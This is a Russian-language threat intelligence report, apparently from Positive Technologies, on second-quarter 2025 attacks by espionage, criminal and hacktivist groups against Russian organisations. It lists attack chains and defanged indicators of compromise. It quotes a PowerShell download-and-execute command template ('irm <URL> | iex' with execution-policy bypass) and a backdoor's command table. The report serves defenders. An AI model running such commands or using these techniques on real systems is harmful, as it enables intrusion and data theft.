Во втором квартале 2025 года группа киберразведки TI департамента Positive Technologies провела мониторинг и анализ активности хакерских группировок и сообществ, нацеленных на российские компании и организации. В результате сформирован отчет, систематизирующий выявленные инциденты и демонстрирующий примеры цепочек атак: какая группировка и каким образом осуществляет свои операции — от начального проникновения до развертывания вредоносного ПО.
В этом отчете мы стремимся донести результаты исследования до широкого круга читателей: от технических специалистов до руководителей бизнес подразделений. Мы не ставили цель охватить максимально большое количество инцидентов, а отобрали наиболее интересные, по нашему мнению, атаки, которые еще не описаны другими вендорами или рассмотрены под новым углом.
Основой нашего анализа стали данные из открытых источников, а также информация, полученная с помощью внутренних систем департамента Threat Intelligence Positive Technologies. Такой подход позволяет не только реконструировать ход каждой атаки, но и выявить характерные особенности работы хакерских группировок, что существенно повышает эффективность превентивных мер и реагирования на инциденты.
Шпионаж
Team46
| Другие названия | TaxOff Prosperous Werewolf Операция «Форумный тролль» |
| Начало активности | 2024 |
| Инструменты | Team46 Loader, TaxOff Loader, Cobalt Strike, Trinper |
| География атак | Россия |
| Атакуемые отрасли | Государственные учреждения Информационные технологии Образование Телекоммуникации Транспортные компании |
В конце марта 2025 года специалисты PT ESC зафиксировали целевую кампанию, в ходе которой злоумышленники с помощью фишингового письма активировали уязвимость CVE-2025-2783 в браузере Chrome. Об этом ранее сообщали коллеги из «Лаборатории Касперского», назвавшие эту операцию «Форумный тролль», однако последующая цепочка заражения осталась без атрибуции.
Рисунок 1. Фишинговое письмо
Рисунок 1. Фишинговое письмоВ ходе нашего исследования мы установили, что при переходе по ссылке эксплойт выводил процесс из песочницы и загружал бэкдор Trinper. Ранее мы установили прямую связь бэкдора Trinper с группировкой TaxOff, о чем подробно рассказали в статье «TaxOff: кажется, у вас... бэкдор».
Изучая эту атаку и инфраструктуру атакующих, мы обнаружили пересечения с группировкой Team46, про которую ранее рассказывали в статье на Хабре: обе группировки применяют одинаковые инструменты и параметры запуска PowerShell-скриптов.
Во всех случаях злоумышленники использовали команду вида
powershell -w <режим окна> -ep Bypass -nop -c "irm <URL> | iex"Эта команда позволяет скрыть окно исполнения, обойти ограничения политики выполнения и сразу же загрузить и выполнить код с удаленного сервера.
В феврале 2024 года хакеры Team46 запускали скрипт с адреса infosecteam.info/other.php?id, а в сентябре того же года перешли на srv510786.hstgr.cloud/ordinary.php?id. При этом синтаксис и структура URL остались теми же: передача уникального идентификатора жертвы через параметр id и запуск полученного кода командлетом iex.
В октябре 2024 года группировка, называвшая себя TaxOff, применила аналогичную команду: запуск через -w minimized, загрузка скрипта с домена ms-appdata-query.global.ssl.fastly.net/query.php?id и мгновенный вызов iex. Несмотря на смену регистрации опций и адреса, общая логика — «скачать по ссылке и сразу выполнить» — сохранилась без изменений.
При сравнении этой атаки и более ранних операций Team46 мы также отметили схожесть векторов атаки: в обоих случаях злоумышленники рассылали фишинговые письма со ссылками, а также использовали эксплойты нулевого дня для браузеров. В текущей кампании эксплуатируется уязвимость в Chrome (CVE-2025-2783), а в предыдущих операциях Team46 применялся DLL hijacking в «Яндекс Браузере» (CVE-2024-6473), когда вредоносная DLL, помещенная в каталог с более высоким приоритетом загрузки, подменяла легитимный модуль и обеспечивала выполнение произвольного кода с правами браузера.
Единообразие в использовании параметров PowerShell, паттерна URL с параметром id, а также схожие векторы атак указывают на то, что TaxOff, скорее всего, — это переименование или ответвление инфраструктуры Team46. Подробнее об этом вы можете узнать в нашей статье «Team46 и TaxOff: две стороны одной медали».
| Домены | mil-by[.]info primakovreadings[.]info 2025primakovreadings[.]info primakovreadings2025.info ads-stream-api-v2.global.ssl.fastly[.]net fast-telemetry-api.global.ssl.fastly[.]net browser-time-stats.global.ssl.fastly[.]net rdp-query-api.global.ssl.fastly[.]net rdp-statistics-api.global.ssl.fastly[.]net clip-rdp-api.global.ssl.fastly[.]net rdp-api-front.global.ssl.fastly[.]net common-rdp-front.global.ssl.fastly[.]net front-static-api.global.ssl.fastly[.]net main-front-api.global.ssl.fastly[.]net ms-appdata-fonts.global.ssl.fastly[.]net ms-appdata-main.global.ssl.fastly[.]net ms-appdata-query.global.ssl.fastly[.]net |
| IP-адреса | 185.81.114[.]15 |
| Имена файлов | twinapi.dll winsta.dll twinapi.dll WINSTA.dll AdobeARM.exe dirlist.exe ProcessList.exe ScreenShot.exe |
| Контрольная сумма | 5f47e40f3a36cc06bbaec27b063cd195 d69854b4a5c324082e157f04889ba138 d003e812336221db029f02738451215c ca767542f4af58fc3072e74574725ee3 16f6227f760487a70a3168cf9a497ac3 1b7b4608f2c9e0a4863a00edd60c3b78 dba17d2faa311f28e68477ea5cc1a300 7d3a30dbf4fd3edaf4dde35ccb5cf926 07d2b50cf8ffe13a4722955ea94317aa f3a70b8073ce2276af75b1cc2f18aced 4b51f3021d8426b8356cd5751ad6ebd0 |
PseudoGamaredon
| Другие названия | Awaken Likho GamaCopy Core Werewolf |
| Начало активности | 2021 |
| Инструменты | UltraVNC, MeshAgent, доставка ВПО через Telegram |
| География атак | Россия Беларусь |
| Атакуемые отрасли | Военно-промышленный комплекс Государственные учреждения Исследовательские компании Промышленность Телекоммуникации Энергетика |
Группировка PseudoGamaredon на протяжении 2-го квартала 2025 года продолжала активно использовать проверенные тактики социальной инженерии и удаленного доступа для проникновения в сети промышленных и оборонных компаний. Специалисты киберразведки Positive Technologies зафиксировали несколько новых образцов вредоносов, маскируемых под легитимные документы: среди наиболее часто встречающихся названий — «Спецификация 13_ Гидравлика» и «Отсканированные документы — Срочно на доклад продвижение противника [дд_мм_гг]».
Рисунки 2-4. Документ-приманка
После запуска таких файлов жертва видит документ-приманку, в то время как в фоновом режиме на систему устанавливается клиент UltraVNC. Это позволяет злоумышленникам незаметно получить удаленный доступ к рабочей станции и далее перемещаться по корпоративной сети.
Тематика используемых приманок отчетливо указывает на интерес к предприятиям оборонно-промышленного комплекса и смежных отраслей, что согласуется с предыдущими наблюдениями за этой группировкой. При этом общая схема атаки (спам-рассылка, атака через вредоносный файл-приманку, установка VNC-бэкдора) и инструментарий остались без существенных изменений, что позволяет PseudoGamaredon быстро тиражировать свои операции и сохранять непрерывность кампаний даже при непрерывном обновлении антивирусных баз.
| Домены | alternativa123[.]ru pl82[.]ru tent-lsk[.]ru siloneq[.]ru nedvij-gel[.]ru |
| IP-адреса | 94.142.140[.]52 80.85.155[.]40 103.71.20[.]195 185.117.153[.]140 185.221.152[.]17 |
| Имена файлов | Спецификация 13_ Гидравлика 2025 Отсканированные документы — Срочно на доклад продвижение противника 08_06_25 |
| Контрольная сумма | beb45d5b740ac1f52ed552a73502b01f 57fec70f4ac0f3d8b640faf133aac7e0 bce5f46b41063ab8e1075cc77ca7343b 21829394cac736a528267f9054fad3a4 54685b75d32cadf4dfdc3a25e6ed02cb |
TA Tolik
| Другие названия | Fairy Wolf |
| Начало активности | 2024 |
| Инструменты | Unicorn |
| География атак | Россия |
| Атакуемые отрасли | Государственные учреждения Промышленный сектор Финансовый сектор Энергетика |
TA Tolik — это условное название группировки, активность которой была впервые зафиксирована в сентябре 2024 года экспертами «Лаборатории Касперского» в рамках описания скрытной кампании с применением ранее неизвестного стилера Unicorn. Целью злоумышленников изначально было целенаправленное хищение конфиденциальных данных, преимущественно из организаций государственного сектора.
Начиная с апреля 2025 года группа киберразведки PT ESC отмечает возобновление активности группировки. Анализ новых образцов вредоноса показал, что в основе деятельности группировки все еще лежит использование Unicorn, злоумышленники внесли лишь косметические изменения — изменили директории и названия скриптов, сохранив логику атаки.
Атаки традиционно начинаются с фишингового письма, внутри которого находится архив с HTA-файлом, маскирующимся под легитимный документ или уведомление от государственных служб. При запуске файл разворачивает на диске жертвы набор VBS-скриптов.
Для закрепления в системе злоумышленники добавляют свои VBS-скрипты в автозагрузку и создают задачи планировщика Windows. Новые записи, маскирующиеся под легитимные программы, автоматически запускают VBS-скрипты для проверки работоспособности и отправки собранных данных на командный сервер.
Особенность Unicorn-стилера заключается в том, что основная вредоносная логика не находится прямо в теле HTA- или VBS-файлов. Вместо этого скрипты читают зашифрованные команды и модули из нескольких веток реестра, расшифровывают их и динамически загружают в память. Такой подход значительно затрудняет анализ и обнаружение, поскольку никакой подозрительный код не лежит в файлах на диске: он скрыт внутри реестра и активируется только в момент выполнения.
Во втором квартале в поле зрения группы киберразведки также попали LNK-файлы, устанавливающие связь с C2-сервером teiehram[.]org, зарегистрированным на то же лицо, что и vm-tiktok[.]org, о котором мы писали ранее в нашем Telegram-канале.
Особенность этих ярлыков заключается в явном тестовом характере: они используют параметр -NoExit и вставку Pause, не пытаются скрыть свое выполнение скрытым запуском PowerShell и не удаляют следы после работы. Для обеспечения однократного исполнения злоумышленники задействуют ключ RunOnce вместо Run.
В описаниях ярлыков также встречаются записи на украинском языке: «Ярлик для запуску PowerShell команди RunScript.lnk», «Ярлик для запуску PowerShell команди» и «Ярлик для запуску PowerShell команди та відкриття Google».
При изучении ВПО, рассылаемого группировкой в адреса организаций военно-промышленного комплекса России, также было установлено, что электронный адрес 155ogvbrmp@bk.ru, с которого отправлялись фишинговые письма, привязан к номерной емкости украинского сегмента сети связи.
Согласно данным Whois для доменов, используемых группировкой, административный контакт зарегистрирован по адресу Vyshnyakivska 13 в Киеве, Киевская область, а в качестве контактного телефона указан номер +380 684 496 267.
Анализ последних модификаций сценариев TA Tolik свидетельствует о том, что злоумышленники активно развивают свои инструменты для расширения покрытия по сбору данных и закрепления в системе.
| Домены | opezdol[.]org teiehram[.]org |
| IP-адреса | 188.114.97[.]3 188.114.96[.]3 |
| Имена файлов | Исх 14322-13 от 27 05 2025 (уведомление) Исх 14-0554-4 от 09 06 2025 (уведомление о невыполнении соглашения) |
| Контрольная сумма | 8bbe0c8f2a1d6fe94a41eb3e01d90866 6d5a097e9407abf91d517fc75d63a23f 1fea1f181d0ded434cd5f488893ce51b |
Sapphire Werewolf
| Начало активности | 2024 |
| Инструменты | Amethyst Stealer |
| География атак | Россия |
| Атакуемые отрасли | Государственные учреждения Здравоохранение Информационные технологии Образование Энергетика |
Группировка Sapphire Werewolf впервые привлекла к себе внимание в марте 2024 года, когда начался массовый цикл атак с использованием стилера Amethyst Stealer.
Во втором квартале аналитики киберразведки Positive Technologies зафиксировали серию целевых атак группировки Sapphire Werewolf, в ходе которых злоумышленники распространяли вредоносные документы, тщательно упакованные в архивы, а также загруженные через сервис обмена файлами getshared[.]com.
Рисунки 12-13. Документ-приманка
При запуске вредоносный файл сначала проверяет, не выполняется ли он в виртуальной среде, и сравнивает системное время с заранее заданной датой: если расхождение превышает несколько дней, он автоматически завершает работу, чтобы избежать анализа в песочнице. После успешной проверки сигнал об открытии файла отправляется на сервис canarytokens, далее модуль приступает к сбору данных о системе жертвы, выгрузке документов определенных расширений и извлечению информации о сессиях мессенджера Telegram. Все собранные сведения аккумулируются и передаются на командный сервер злоумышленников, при этом для обеспечения скрытности и обхода сетевых ограничений коммуникация может вестись как через специально созданного Telegram-бота @retardio_bot, так и посредством туннелирования через ngrok.
При анализе работы Telegram-бота @retardio_bot, через который осуществляется управление ВПО, установлено, что последняя зафиксированная сессия обмена сообщениями между ботом и оператором состоялась примерно год назад. С тех пор никаких новых запросов, обновлений статуса или подтверждений от оператора не зафиксировано, что позволяет сделать вывод о том, что активное использование этого инструмента приостановлено.
| Домены | elk-divine-immensely.ngrok-free[.]app wondrous-bluejay-lively.ngrok-free[.]app |
| Telegram-бот | @retardio_bot |
| Имена файлов | Производство_по_делу.exe Служебная записка.exe Sluzebnaja_zapiska_o_povishenie.exe InformacionnijZapros.exe |
| Контрольная сумма | 1a2df6d36edf9789ea1261a50cbea7ee 4bf13f1be4c5e79300e9422c51d131f8 565f8d22fa003ac7014d5d8efd8c1a53 3814bcc23d5e8e9fa39c0e2c610aec15 |
PhaseShifters
| Другие названия | Angry Likho Sticky Werewolf |
| Начало активности | 2023 |
| Инструменты | Meta Stealer, Ozone RAT, QuasarRAT, Rhadamanthys Stealer, Ande Loader, Sliver, Remcos RAT, Lumma Stealer, DarkTrack RAT, AsyncRAT, Redline, Remcos, njRAT и XWorm |
| География атак | Россия Беларусь Польша |
| Атакуемые отрасли | Государственные учреждения Исследовательские компании Промышленность Строительство Телекоммуникации Транспорт Энергетика |
В течение мая специалисты группы киберразведки PT ESC фиксировали возрастание активности хакерской группировки PhaseShifters, направленное на проведение фишинговых кампаний под видом официальных рассылок Министерства науки и высшего образования Российской Федерации. Для реализации этой операции злоумышленники зарегистрировали домен minobnauki[.]ru, MX-запись которого указывает на IP-адрес 193.124.33[.]207. Любопытно, что на том же сервере ранее располагался домен mail.min-prom[.]ru, который PhaseShifters использовали для рассылки фишинговых писем от имени Министерства промышленности и торговли Российской Федерации, что свидетельствует о целенаправленном повторном использовании инфраструктуры.
В теле фишинговых сообщений получателям предлагается загрузить зашифрованный архив, внутри которого обнаруживается вредоносное ПО QuasarRAT, замаскированное под документ формата DOCX.
Вместе с основным файлом в архиве содержится отдельный документ-приманка, выполняющий роль вспомогательного приложения и повышающий вероятность успешного запуска эксплойта конечным пользователем.
При распаковке и запуске вредоносного модуля QuasarRAT отслеживает наличие в системе продуктов для антивирусной защиты, проверяя ключевые процессы и службы, в частности bdservicehost, SophosHealth, AvastUI, AVGUI, nsWscSvc и ekrn. В зависимости от результатов этих проверок модифицируются параметры последующего запуска вредоноса.
Основная нагрузка QuasarRAT доставляется фрагментами с расширением .adt, которые затем объединяются в единый исполняемый файл при помощи командной инструкции "cmd /c copy /b ...". Пошаговый процесс объединения Quiet.adt, Achievements.adt, Yen.adt и других фрагментов завершается созданием конечного исполняемого файла, после чего начинается этап закрепления угрозы в системе жертвы. Для обеспечения автоматического старта при каждом входе пользователя в операционную систему вредоносное ПО копирует ярлык своего исполняемого файла в пользовательскую папку автозагрузки.
С целью маскировки своей деятельности атакующий процесс создает экземпляр системного бинаря RegAsm.exe, в который затем внедряется код QuasarRAT. Инжектирование позволяет обойти контроль целостности системных файлов и отказаться от использования стандартных путей запуска. После инъекции устанавливается защищенное соединение с командным сервером по адресу 5.8.11[.]119:4782, где размещен сертификат для организации SSL-канала управления, что обеспечивает дополнительный уровень шифрования и затрудняет сетевой детект.
Следует отметить, что описанная C2-инфраструктура ранее уже применялась группировкой PhaseShifters в предыдущих операциях, однако конфигурация серверов тех кампаний опиралась на домены thelightpower.info и crostech.ru. Анализ паттернов регистрации фишинговых доменов показывает, что злоумышленники отдают предпочтение IP-адресам, привязанным к автономной системе AS41745 ("Baykov Ilya Sergeevich").
| Домены | min-prom[.]ru mail.min-prom[.]ru superjoke[.]ru forum-drom[.]ru cloud-telegram[.]ru about-sport[.]ru minobnauki[.]ru |
| IP-адреса | 193.124.33[.]207 5.8.11[.]119 |
| Имена файлов | Prilozenie_k_pis_mu.docx Pis_mo_zapros_na_predpriatia_OPK.doc.exe.exe Исходящий от 26.05.2025.7z |
| Контрольная сумма | 2b7004cb00d58967c7d6677495d3422e 0bbb3a2ac9ba7d14a784cbc2519fbd64 40ef2615afb15f61072d7cea9b1a856a 681af8a70203832f9b8de10a8d51860a |
Rare Werewolf
| Другие названия | Rezet Librarian Ghouls |
| Начало активности | 2019 |
| Инструменты | Blat, Anydesk, XMRig, Mipko Employee Monitor, tuna, ngrok |
| География атак | Россия |
| Атакуемые отрасли | Военно-промышленный комплекс Неправительственные организации Строительство Телекоммуникации Финансовый сектор |
В предыдущем квартале на основе нашей аналитики Rare Werewolf была классифицирована как финансово мотивированная киберпреступная группировка. Однако детальный мониторинг ее инфраструктуры и атак показал, что приоритетной задачей этой группы является сбор конфиденциальной информации, а применение майнера XMRig в ряде инцидентов служит лишь вспомогательным механизмом.
На протяжении апреля — июня группа киберразведки фиксировала попытки Rare Werewolf атаковать предприятия военно-промышленного комплекса. Метод остается неизменным: злоумышленники направляют письма с ZIP-архивом, защищенным паролем, указанным в тексте сообщения, что позволяет обойти почтовые фильтры.
Внутри архива содержится SCR-файл, при запуске которого сначала демонстрируется документ-приманка, а затем по скрытому каналу загружается дополнительный архив с PowerShell- и BAT-скриптами.
Распаковка осуществляется в скрытую папку, после чего скрипты извлекают дампы реестров SAM и SYSTEM, сканируют локальную сеть и устанавливают AnyDesk для удаленного управления.
Сканирование по жестко заданным IP-адресам занимает около 9–10 минут, что существенно превышает временные рамки эмуляции в публичных песочницах. Вероятно, задержка призвана затруднить динамический анализ вредоносного ПО.
В июньских семплах замечена попытка перехода с публичного туннелирования через ngrok на собственный обратный SSH-туннель
с использованием Tuna и штатного sshd в целях повышения скрытности
и надежности канала связи с C2-сервером.
На протяжении последних месяцев группировка пыталась мимикрировать под российский военный концерн, распространяя вредоносное ПО через домены, максимально сходные с легитимным.
| Домены | vniir[.]nl almaz-antey-info[.]online antey-almaz-info[.]site almaz-anley[.]site autotificate[.]com |
| IP-адреса | 92.63.173[.]61 92.63.173[.]57 31.172.74[.]174 |
| Имена файлов | Коммерческое предложение № 879 от 13.05.2025 Договор на поставку продукции Д0501.2346 Докуметы на поставку, с правками.scr СХЕМА ОПОВЕЩЕНИЯ РЕЖИМ КОВЕР.docx.scr |
| Контрольная сумма | 8ed87e97879cba7b64d61445991312a6 f04aecd527cd9a18176a4f1f7c12e0c3 e337949e7f5e257a38f869599e58e47e 7b02f6bbe04f989db804154e87e5f726 |
Финансово мотивированные группировки
Werewolves
| Другие названия | Moonshine Trickster Lone Wolf |
| Начало активности | 2023 |
| Инструменты | LockBit, Meterpreter, Netscan, SoftPerfect Network Scanner, Cobalt Strike |
| География атак | Россия |
| Атакуемые отрасли | Государственные учреждения Промышленный сектор Телекоммуникации Транспортные компании Финансовый сектор Энергетика |
Группировка Werewolves впервые зафиксирована в июне 2023 года, она использует модифицированный шифровальщик LockBit 3 Black, утекшие инструменты Conti, Cobalt Strike Beacon в загрузчиках .doc/.xls, AnyDesk и Netscan для перемещения по сети, а также открытый DLS-сайт для публикации похищенных данных.
В июне аналитики фиксировали фишинговые рассылки группировки Werewolves, направленные на компании из строительного и гостинично-ресторанного сектора.
Атака начинается с фишингового письма, содержащего вложение в формате DOС.
Рисунки 20-22. Фишинговое письмо
При открытии файла активируется эксплуатация уязвимости CVE-2017-0199, что приводит к загрузке RTF-документа с удаленного сервера. Внутри этого RTF-файла срабатывает уязвимость Equation Editor (CVE-2017-11882), позволяющая выполнить произвольный машинный код в системе жертвы.
Далее полезная нагрузка инициирует обращение к сокращенной ссылке на домене yip[.]su, автоматически перенаправляющей на скачивание HTA-файла.
Это HTML-приложение-стейджер инкапсулирует Beacon-агент Cobalt Strike и загружается через стандартный системный процесс mshta.exe с ранее компрометированных легитимных ресурсов.
После запуска агент устанавливает защищенный TLS-канал связи с командно-контрольным сервером, обеспечивая злоумышленникам возможности удаленного управления, перемещения внутри периметра и развертывания дополнительных модулей для устойчивого присутствия в инфраструктуре жертвы.
| Домены | babygangs.albertn[.]ru praestol[.]su комплексон[.]рф armstroy42[.]ru lieri[.]ru cba.abc92[.]ru toolhaus[.]ru mysterykamchatka[.]ru clack[.]su |
| IP-адреса | 31.207.76[.]246 45.141.233[.]44 83.220.168[.]36 |
| Имена файлов | рекламация.doc претензия(исковое).doc исковое заявление.doc |
| Контрольная сумма | 9c52cb726a012cd97a8ba5923a822c64 f9cfd8e78287b2824dd1d17adb7a0cb7 e3827843c0a21fdc4a2781ce58de1e55 f9026fabfb8d131863ad06fd72eb2717 |
DarkGaboon
| Другие названия | room155 Vengeful Wolf |
| Начало активности | 2023 |
| Инструменты | N. S., XWorm, Warzone RAT (AveMaria), VenomRAT, Darktrack, DarkCrystal, Stealerium, RevengeRAT, LockBit |
| География атак | Россия |
| Атакуемые отрасли | Неправительственные организации Телекоммуникации Транспортные компании Финансовый сектор |
DarkGaboon — финансово мотивированная хакерская группировка, впервые зафиксированная Positive Technologies в январе 2025 года с операциями, ведущимися с весны 2023 года. Она нацелена на российские компании из банковского, туристического и государственного сектора, а также из сферы ритейла.
В течение второго квартала эксперты Positive Technologies фиксировали атаки, проводимые группировкой DarkGaboon.
Для первоначального проникновения злоумышленники используют массовые фишинговые рассылки на русском языке, в которых адресатам направляются ZIP-архивы с названиями, имитирующими финансовую отчетность и акты сверки.
Внутри архива содержатся RTF-документ-приманка и исполняемый файл формата SCR, замаскированный под PDF, что обеспечивает высокую вероятность открытия вложения сотрудниками бухгалтерии.
Исполняемый модуль представляет собой обфусцированную сборку Revenge RAT или XWorm, упакованную с помощью Themida или .NET Reactor и подписанную поддельным сертификатом под видом российских бухгалтерских компаний. После запуска он закрепляется в системе, устанавливает удаленный доступ и развертывает дроппер, который с помощью сканера N. S. обнаруживает сетевые ресурсы, очищает временные файлы cleanmgr, шифрует данные LockBit 3.0 и оставляет вымогательскую записку на русском языке с эл. почтой для связи, не эксфильтруя информацию и завершая атаку удалением RAT и артефактов через BAT-скрипт.
Инфраструктурные компоненты кампании включают домены dynamic DNS с «африканскими» названиями (например, kilimanjaro), а также виртуальные Windows-хосты с RDP-доступом, арендованные в американских и сейшельских сетях. Указанный домен room155[.]online, впервые зарегистрированный в марте 2023 года, выступает проксирующим сервером на основе PowerDNS, получившим делегирование порядка 500 субдоменов, что затрудняет идентификацию конечных узлов управления.
Анализ поведения DarkGaboon показывает, что группировка действует автономно и не является аффилиатом RaaS-сервиса LockBit, используя открыто доступную версию шифровальщика без последующей публикации украденных данных. Такой подход позволяет злоумышленникам «затеряться» на фоне множества аналогичных атак, сохраняя при этом фокус на вымогательстве и минимизируя риск раскрытия.
| Домены | myhost.servepics[.]com myhost.misecure[.]com kilimanjaro.theworkpc[.]com |
| IP-адреса | 196.251.66[.]118 185.185.70[.]85 |
| Имена файлов | Aкт cвepки взaимopacчeтoв пo cocтoянию нa 12.06.2025 гoдa.pdf.scr Aкт cвepки взaимopacчeтoв пo cocтoянию нa 10.06.2025 гoдa.xlsx.scr Aкт cвepки взaимopacчeтoв пo cocтoянию нa 14.05.2025 гoдa.scr |
| Контрольная сумма | 83caa65afe19715794d05b79795324c9 8216c6dfd7f81fc011aff73384189e93 5cbdd74815ecd5aed597ade5605e4876 |
DarkWatchman
| Другие названия | Hive0117 Watch Wolf |
| Начало активности | 2021 |
| Инструменты | DarkVNC, FakeUpdate, TeamViewer, KillDisk, WebBrowserPassView, DarkWatchman, Buhtrap |
| География атак | Россия, Казахстан, Армения |
| Атакуемые отрасли | Промышленный сектор Сельскохозяйственная промышленность Телекоммуникации Транспортные компании Финансовый сектор Энергетика |
Несмотря на общее снижение активности группы DarkWatchman в течение текущего квартала, в апреле 2025 года была зафиксирована фишинговая кампания, полностью соответствующая ранее отработанным злоумышленниками тактикам. Вредоносный контент распространялся посредством массовой рассылки электронных писем, в теле которых содержались обращения с просьбой предоставить документацию. Тематика сообщений была выдержана в нейтральном формате в попытке позиционировать письмо как легитимный деловой запрос.
В качестве прикрепленных файлов злоумышленники использовали архивы с общими названиями «документы», «документация», чтобы снизить подозрительность вложений для конечного пользователя.
Внутри архива находится вредоносное ПО DarkWatchman — бэкдор, разработанный на языке JavaScript. Архитектура этого ПО предусматривает создание скрытого канала коммуникации с командным сервером и последующую загрузку дополнительных модулей, обеспечивающих расширение функциональности и обеспечение устойчивого присутствия в системе жертвы.
Анализ заголовков электронных писем показал, что доменное имя отправителя alliance-s.ru ранее принадлежало ликвидированной компании ООО «Альянс» (Саратов) и с 2016 года не продлевалось. Повторная активация этого домена злоумышленниками произошла 29 апреля 2025 года, что свидетельствует о целенаправленной подготовке инфраструктуры для фишинговой кампании. В этот же день домен был перенаправлен на немецкий хостинг и настроен для работы основных почтовых протоколов.
Сопоставление временных меток в DNS-записи и конфигурациях почтовых сервисов показывает, что подготовительные работы по развертыванию инфраструктуры проводились с учетом обеспечения устойчивости и анонимности операций.
| Домены | alliance-s[.]ru 4ad74aab.biz[.]ua 4ad74aab[.]cfd 4ad74aab[.]xyz 4ad74aab[.]fun 4ad74aab[.]store 4ad74aab[.]online |
| IP-адреса | 178.236.253[.]132 185.159.131[.]10 |
| Имена файлов | Док-ы от 29.04.2025.exe Документация от 29.04.2025.exe Ispolnitelniy_List_1180691-25.scr |
| Контрольная сумма | b996ed39687fe735933e66c7c4edc217 bdde5d0dca5afcc33e0ab85d4be9faaa 0d881bb9756c9cd5c8b02ffce576b2ed d55ca92a8b007d0d6257dd68f519bf46 |
Хактивизм
Black Owl
| Другие названия | BO Team Lifting Zmiy Hoody Hyena |
| Начало активности | 2024 |
| Инструменты | BrockenDoor, Reverse SSH, DarkGate, Remcos, Babuk |
| География атак | Россия |
| Атакуемые отрасли | Государственные учреждения Здравоохранение Промышленный сектор Сельскохозяйственная промышленность Телекоммуникации Транспортные компании |
Позиционируют себя как проукраинские киберактивисты, проводя деструктивные атаки на инфраструктуру российских организаций с использованием программ-шифровальщиков.
В конце мая специалисты по киберразведке Positive Technologies выявили целевую фишинговую кампанию, приуроченную к транспортно-логистическому форуму: злоумышленники развернули фишинговые домены rzd-partner[.]pro и rzd-partner[.]store, через которые распространяли архив RZD_Forum_28.05.rar с вредоносом семейства BrockenDoor. Внутри архива под видом PDF-документа с программой форума скрывался исполняемый файл «Программа Форума.pdf .exe».
В имени этого файла после «Программа Форума.pdf» вставлены не обычные ASCII-пробелы, а невидимые пробельные символы Unicode U+205F (medium mathematical space), которые визуально выглядят как тонкие «пропуски», но на самом деле маскируют реальное расширение .exe, затрудняя обнаружение и автоматический анализ.
При открытии «Формы опроса.pdf.exe» происходит запуск PDF-приманки.
Бэкдор BrockenDoor в фоновом режиме устанавливает соединение с C2-сервером 194.190.153[.]198:7194. Набор команд расширен по сравнению с образцами 2024 года, исследованными коллегами из «Лаборатории Касперского».
| Команда | Полное название | Что делает бэкдор |
|---|---|---|
| spi | Set Poll-Interval | Изменяет временной интервал, с которым обращается к серверу |
| rp | Run Program | Получает бинарный файл, сохраняет его на диск и запускает одним из четырех способов |
| sd | Self-Delete | Удаляет себя командой |
| ec | Execute Command | Выполняет произвольную команду |
| rl | Reflective Load | Загружает PE-файл прямо в память, не сохраняя на диск, и вызывает его |
| Домены | rzd-partner[.]pro rzd-partner[.]store |
| IP-адреса | 194.190.153[.]198 |
| Имена файлов | «Форма опроса.pdf .exe» «Программа Форума.pdf .exe» RZD_Forum_28.05.rar |
| Контрольная сумма | ccbc459d2e846666111efefbe2343570 09b32f24a829921fe33f008cfa89fbeb a73283275ba43a96ce0e44a2b4daf392 |
Хактивизм: массовые взломы сайтов
Группа киберразведки систематически регистрирует факты компрометации российских веб-ресурсов. Как показывают результаты мониторинга, основными объектами злоумышленников становятся небольшие сайты: онлайн-магазины, персональные блоги и региональные информационные порталы. Несмотря на относительно невысокую популярность подобных ресурсов, их взлом может привести к серьезным негативным последствиям как для владельцев, так и для конечных пользователей. В первую очередь это касается несанкционированного доступа к клиентским базам данных, содержащим персональную информацию и историю транзакций, что существенно повышает риски мошенничества и утечки конфиденциальных сведений.
Полученные в результате таких атак привилегии часто используются киберпреступниками для внедрения вредоносного кода, обеспечивающего дальнейшее распространение угроз. В частности, злоумышленники могут маскировать фишинговые страницы под легитимные домены и рассылать целевые электронные письма с предложением перейти по вредоносным ссылкам, что существенно повышает вероятность успешного обмана доверчивых пользователей.
Анализ данных указывает на то, что некоторые группы, подобные Werewolves, регулярно задействуют скомпрометированные площадки для организации многоступенчатых фишинговых кампаний.
Кроме того, часть участников теневого рынка предпочитает перепродавать полученные доступы третьим лицам. На специализированных форумах и в закрытых телеграм-каналах можно встретить объявления о продаже shell-доступа к серверным ресурсам, а также о реализации похищенных банковских данных.
Так, группа setupp.es ведет публичную деятельность на ресурсе xleet[.]in, где публикует коммерческие предложения по настройке серверов, продаже shell-доступов и банковских данных, извлеченных в ходе атак.
Методики хактивистов включают в себя целенаправленный сбор уязвимостей на уровне веб-приложений, эксплуатацию устаревших плагинов и ошибок конфигурации серверов. После получения доступа злоумышленники модифицируют содержимое целевых страниц, размещая пропагандистские материалы или перенаправляя трафик на поддельные страницы, замаскированные под официальные ресурсы.
Заключение
Во втором квартале текущего года мы фиксировали заметный рост активности как хакерских группировок, так и хактивистов. При этом в подавляющем большинстве случаев первоначальным вектором атак остается фишинговая рассылка — будь то сложные атаки Team46 с эксплойтами нулевого дня или действия хакеров Rare Werewolf, использующих bat- и ps1-скрипты в связке с AnyDesk. Для рассылок злоумышленники регистрируют домены, визуально имитирующие легитимные, прибегают к захваченным реальным почтовым ресурсам, как это практикует Werewolves, либо покупают инфраструктуру у третьих лиц, которым доверяют рассылку фишинга. Параллельно мы наблюдаем рост числа вирусных файлов, содержащих сгенерированные нейросетями фрагменты кода, что связано с широкой доступностью облачных AI-сервисов и стремительного развития языковых моделей, позволяющих злоумышленникам быстро адаптировать и обфусцировать вредоносные модули для обхода классических средств защиты.